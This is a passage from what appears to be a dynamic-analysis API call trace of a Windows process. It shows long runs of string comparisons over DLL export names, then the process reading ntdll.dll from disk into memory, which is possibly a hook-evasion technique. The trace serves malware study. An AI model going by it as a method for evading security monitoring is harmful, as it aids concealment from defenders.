(lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0150.805] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0150.805] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0150.805] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0150.805] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0150.806] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0150.806] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0150.807] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0150.807] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0150.808] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0150.808] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0150.808] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0150.808] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0150.808] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0150.808] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0150.809] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0150.810] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0150.810] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0150.810] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0150.811] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0150.811] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0150.811] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0150.812] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0150.813] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0150.813] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0150.813] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0150.813] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0150.813] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0150.813] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0150.813] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0150.813] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0150.813] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0150.813] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0150.813] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0150.813] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0150.922] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0150.922] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0150.922] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0150.922] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0150.922] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0150.922] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0150.922] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0150.922] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0150.923] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0150.949] GetProcessHeap () returned 0x4d0000 [0150.949] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4001040 | out: hHeap=0x4d0000) returned 1 [0150.955] GetProcessHeap () returned 0x4d0000 [0150.955] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e8ff0 [0150.955] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0150.956] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0150.956] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0150.956] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0150.956] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0150.957] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0150.957] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0150.957] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0150.957] GetProcessHeap () returned 0x4d0000 [0150.957] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1bba48) returned 0x4001040 [0151.043] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0151.043] ReadFile (in: hFile=0x140, lpBuffer=0x4001040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4001040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0151.165] CloseHandle (hObject=0x140) returned 1 [0151.165] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0151.165] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0151.165] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0151.165] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0151.165] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0151.165] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0151.165] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0151.165] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0151.165] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0151.165] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0151.166] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0151.166] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0151.166] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0151.166] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", 